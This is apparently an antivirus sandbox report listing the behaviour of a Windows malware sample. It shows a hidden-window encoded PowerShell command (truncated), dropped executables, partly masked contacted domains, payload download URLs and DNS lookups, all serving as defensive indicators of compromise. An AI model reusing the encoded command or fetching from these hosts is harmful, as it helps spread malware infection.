Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAaQB0AG0AZQBpAHEAdQBzAGkAeABoAGEAaAA9ACcAeQBhAHcAcQB1AGkAbwBwAHQAbwBhAHkAdgBvAGkAawBrAG8AZQB6AGcAYQBlAHgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1976
- %TEMP%\1228320.cvr
- %HOMEPATH%\137.exe
- 'ch###lair.com':443
- 'pk#.goog':80
- 'em######itnessacademy.com':80
- 'du###ieu247.com':80
- http://pk#.goog/gsr1/gsr1.crt
- http://em######itnessacademy.com/xlnwk/fdJI32622/
- http://du###ieu247.com/wp-content/34/
- http://ww##.##oclieu247.com/wp-content/34/?su#########################################
- 'ch###lair.com':443
- DNS ASK ar#####erprisesrbl.com
- DNS ASK oa##no.com
- DNS ASK ch###lair.com
- DNS ASK pk#.goog
- DNS ASK em######itnessacademy.com
- DNS ASK du###ieu247.com
- DNS ASK ww##.##oclieu247.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAaQB0AG0AZQBpAHEAdQBzAGkAeABoAGEAaAA9ACcAeQBhAHcAcQB1AGkAbwBwAHQAbwBhAHkAdgBvAGkAawBrAG8AZQB6AGcAYQBlAHgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AC...' (со скрытым окном)